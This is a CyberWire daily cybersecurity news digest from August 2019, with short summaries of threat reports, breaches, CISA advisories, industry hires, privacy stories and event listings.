Get your copy of the definitive guide to threat intelligence.
We brought together a team of experts and wrote the definitive guide to everything you need to know about threat intelligence. Whether you work in vulnerability management, incident response, or another part of cybersecurity, our book has something for you. Get your free copy of “The Threat Intelligence Handbook” now.
August 21, 2019.
This October: the CyberWire's 6th annual Women in Cybersecurity Reception.
Our 6th Annual Women in Cybersecurity Reception will be held this October 24th in the International Spy Museum's new facility at L'Enfant Plaza in Washington, DC. The Women in Cybersecurity Reception highlights and celebrates the value and successes of women in the cybersecurity industry. The event focuses on networking, and it brings together leaders from the private sector, academia and government from across the region, and women at varying points in their careers. It's not a marketing event; it's just about creating connections. If you're interested in getting an invitation to this year's event, tell us a little bit about yourself and request one here. A very limited number of sponsorship opportunities remain, so please let us know if you're interested in one of those, too.
By the CyberWire staff
After Twitter on Monday identified and suspended 936 accounts it determined were conducting information operations against the ongoing protests in Hong Kong (and modified its advertising policy to no longer accept paid advertising from state-controlled media), and after Facebook took down seven pages, three groups, and five accounts for the same coordinated inauthenticity, China's government protested the companies' actions. Beijing says the accounts belonged to Chinese living temporarily overseas: they were expressing their patriotic outrage over the Hong Kong protests. China's government added, Reuters reports, that it also had a "right to tell its story."
Group-IB has a follow-up report on Silence, the Russian-speaking criminal gang they've tracked for the last three years. Initially marked by slovenly opsec and a target set largely confined to Russia, Silence has upgraded its security game and expanded internationally. Their expansion and improvement seem opportunistic and derivative, repurposing code and perhaps personnel from other gangs, notably TA505. Their customary infection technique is phishing, beginning with a reconnaissance phase that sends bogus email delivery failure notices.
Stars and Stripes reports that US servicemembers are caught up in a large South Korean credit card breach.
Scammers are gaming search engine results with paid advertising to display their own phone numbers at the top of search results for help lines belonging to well-known brands, Naked Security reports. The ads seem to make economic sense for the criminals: they get a solid return on their marketing investment. Voice assistants have proven particularly vulnerable to this form of deception.
Today's issue includes events affecting Armenia, Australia, Austria, Azerbaijan, Belarus, China, Cyprus, Czech Republic, Denmark, European Union, Georgia, Germany, Greece, India, Iran, Israel, Kazakhstan, Kenya, Republic of Korea, Kyrgyzstan, Latvia, Malaysia, New Zealand, Poland, Romania, Russia, Serbia, Taiwan, Turkey, Switzerland, Ukraine, United Kingdom, United States, Uzbekistan, and Vietnam.
Bring your own context.
Bug bounties used to be a mom-and-pop segment of the security market, but that's changed.
"We're definitely seeing more adoption. It's becoming much more mainstream, I would say. And also, we're actually starting to see the rewards more accurately reflect the type of value that these kinds of bugs have. You're seeing organizations offering rewards in the tens or, in some places, even hundreds of thousands of dollars, which really makes it worth that investment on behalf of the researcher to be spending the time to find these unique and interesting vulnerabilities in software."
—Ben Waugh, chief security officer at Redox, on the CyberWire Daily Podcast, 8.19.19.
Companies are also growing more comfortable with outsiders looking at their systems. (The outsiders are going to poke around in any case, right?)
Is your cybersecurity program aligned with your business goals and objectives?
Cybersecurity is a business risk, not an IT problem, and a critical part of business strategy. Security should not be an afterthought. Taking a proactive approach facilitates board-level cyber initiative buy in, supports traction across business units, establishes management alignment for key priorities, and manages data complexity. Let Edwards Performance Solutions better structure and position your cybersecurity program – making it a business asset for continued success.
Cyber Warrior Women Summer Social: Sip and Paint(Columbia, MD, United States, August 21, 2019) Join the Cybersecurity Association of Maryland, Inc. (CAMI) for the annual Cyber Warrior Women Summer Social, an all-about-fun-and-networking event! We're adding an artistic element to this year's event with a wine glass painting exercise. No previous art experience required.
Cyber Security Summits: Chicago on August 27 and on September 17 in Charlotte(Chicago, Illinois, United States, August 27, 2019) Register for reduced admission to the Cyber Security Summit with promo code cyberwire19 for $95 admission ($350 without code). Sr. Level Executives are invited to learn about the latest threats & solutions in Cyber Security from experts from The FBI, Google, IBM, Darktrace, and more. Breakfast, Lunch & Cocktail Reception are included with your admission. Passes are limited, secure yours today: www.CyberSummitUSA.com
Second Annual DataTribe Challenge(Online, October 1, 2019) Register now for a chance to be DataTribe's next world-class company. Finalists will split a $20,000 prize, and the winner may receive $2m in funding from DataTribe. Contestants have until October 1st to apply at www.datatribe.com/challenge.
Zero Day Con(Washington, DC, USA, October 22, 2019) Zero Day Con hosts a day of expert discussion on security approaches to regain control over your systems, data, and information. Join us to examine insights, security technologies, and key priorities to secure your systems. Get a 30% discount for Labor Day using code LABOR30.
Cyber Attacks, Threats, and Vulnerabilities
Attacks by Silence(Group-IB) A comprehensive technical analysis of this small cybercriminal group’s tools, tactics, and evolution. This is the first time Group-IB’s reports of this kind have been made publicly available.
New Phishing Campaign Bypasses Microsoft ATP to Deliver Adwind to Utilities Industry(Cofense) The CofenseTM Phishing Defense CenterTM has observed a new phishing campaign that spoofs a PDF attachment to deliver the notorious Adwind malware. This campaign was found explicitly in national grid utilities infrastructure. Adwind, aka JRAT or SockRat, is sold as a malware-as-a-service where users can purchase access to the software for a small subscription-based fee. The malware boasts the following features: Takes screen shots Harvests credentials from Chrome, IE and Edge Accesses the webcam, record video and take photos Records audio from the microphone Transfers files Collects general system and user information Steals VPN certificates Serves as a Key Logger Email Body Fig1. Email Body...
Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response(TrendLabs Security Intelligence Blog) When we first investigated MyKings in 2017, we focused on how the cryptominer-dropping botnet malware used WMI for persistence. Like Mirai, MyKings seems to be constantly undergoing changes to its infection routine. The variant we analyzed for this incident did not just have a single method of retaining persistence but multiple ones, as discussed in the previous section. In addition to WMI, it also used the registry, the task scheduler, and a bootkit — the most interesting of which is the bootkit (detected by Trend Micro as Trojan.Win32.FUGRAFA.AB).
Criminals on the Hunt For Ransomware on Underground Forums(Threatpost) A detailed look at underground forums shows that cybercriminals aren't sure where to look on the heels of the GandCrab ransomware group shutting its doors – and low-level actors are taking advantage of that by developing their own strains.
MoviePass security lapse exposed customer card numbers(TechCrunch) Movie ticket subscription service MoviePass has exposed tens of thousands of customer card numbers and personal credit cards because a critical server was not protected with a password. Mossab Hussein, a security researcher at Dubai-based cybersecurity firm SpiderSilk, found an exposed database on …
Sierra Wireless AirLink ALEOS (Update A)(CISA) 1. EXECUTIVE SUMMARY
CVSS v3 9.1
ATTENTION: Exploitable remotely/low skill level to exploit/public exploits are available
Vendor: Sierra Wireless
Equipment: AirLink ALEOS
Vulnerabilities: OS Command Injection, Use of Hard-coded Credentials, Unrestricted Upload of File with Dangerous Type, Cross-site Scripting, Cross-site Request Forgery, Information Exposure, Missing Encryption of Sensitive Data
Siemens SCALANCE X Switches (Update A)(CISA) 1. EXECUTIVE SUMMARY
CVSS v3 8.6
ATTENTION: Exploitable remotely/low skill level to exploit
Equipment: SCALANCE X switches
--------- Begin Update A Part 1 of 2 ---------
Vulnerability: Insufficient Resource Pool
--------- End Update A Part 1 of 2 ---------
Zebra Industrial Printers(CISA) 1. EXECUTIVE SUMMARY
CVSS v3 5.3
ATTENTION: Low skill level to exploit
Equipment: Industrial Printers
Vulnerability: Insufficiently Protected Credentials
2. RISK EVALUATION
Successful exploitation of this vulnerability could allow a remote attacker to send specially crafted packets to a port on the printer, resulting in the retrieval of a front control panel passcode.
Beyond Compliance: Cyber Threats and Healthcare(FireEye) The healthcare vertical faces a range of threat actors and malicious activity. Given the critical role it plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential.
Gemini crypto exchange led by Winklevoss names Damato as CSO(Mobile Payments Today) Gemini Trust Co., a cryptocurrency exchange led by the Winklevoss brothers, has named David Damato, the former chief security officer at Tanium, as its new CSO. While at Tanium, Damato was in charge of building and managing a team that...
ZeroNorth Names John Worrall as CEO(Yahoo) ZeroNorth, the industry’s only provider of risk-based vulnerability orchestration, announced today that John Worrall has been named chief executive officer. Worrall brings more than 25 years of leadership, strategy and operational experience to the role, across early stage and established cybersecurity
U.S. Cities Rethink Data Relationship With Residents(Wall Street Journal) Cities across the country are measuring everything from air quality to traffic. Privacy rules and hackers’ interest in such information are prompting city officials to think carefully about how that information is managed.
Victimology: in the shoes of a cybersecurity analyst(ThreatQuotient) When a threat arises, the security team role is to investigate and determine the reality of an attack and its severity. This investigation makes it possible to set up a plan to defeat the offensive and, generally, better protect against certain type of attacks.
Keeping cameras cyber safe: The perils of wireless connectivity(The Financial Express) Since modern cameras no longer use film to capture and reproduce images, the International Imaging Industry Association devised a standardised protocol known as Picture Transfer Protocol (PTP) to transfer digital images from camera to PC.
Don't Renew Section 215 Indefinitely(Electronic Frontier Foundation) The New York Times reported that the Trump administration wants Section 215, the legal authority that allows the National Security Agency to collect Americans’ telephone records, renewed indefinitely. That’s despite earlier reports the NSA had shuttered its Call Details Record (CDR) Program because...
Cyber Command head wants name changed(The Augusta Chronicle) U.S. Army Cyber Command is on its way to Augusta, but it might look a little different.During a keynote address at AFCEA’s TechNet Augusta 2019, Lt.
Reclaiming the rights to one’s digital persona(The Washington Times) Most individuals keep a pretty firm grip on their possessions — the cars, the house and the stuff inside it. They’ve got a fairly accurate grasp of their money, too, by taking a quick scan of their financial assets online. Personal data, though, is another story. The complexion of the information that tech giants glean from surveilling users’ Internet activities is as murky for most Americans as a trek in the woods after dark. Americans urgently need a more effective means of ensuring that their cyber-persona is not being stalked from the digital shadows by buck-raking marketers.
Mercedes caught up in privacy storm over car trackers(CNN) Mercedes-Benz is using location sensors to track and repossess vehicles in the United Kingdom when drivers fall behind on payments, raising privacy concerns and leading one prominent politician to call for a government investigation.
For a complete running list of events, please visit the Event Tracker on the CyberWire website.
SecureWorld Bay Area(Santa Clara, California, USA, August 21, 2019) Connecting, informing, and developing leaders in cybersecurity. For the past 17 years, SecureWorld conferences have provided more content and facilitated more professional connections than any other event...
Pittsburgh Cybersecurity Conference(Pittsburgh, Pennsylvania, USA, August 22, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...
Integrate(Melbourne, Victoria, Australia, August 27 - 29, 2019) Get ready to think beyond and lose yourself in the technology of tomorrow at Integrate 2019. Integrate is Australia's leading event dedicated to helping businesses harness the power of AV technology to...
Washington DC Cybersecurity Conference(Washington, DC, USA, August 29, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...
SPONSOR & SUPPORT
Grow your brand and reach new customers.
Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.
Be a part of the CyberWire story.
People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.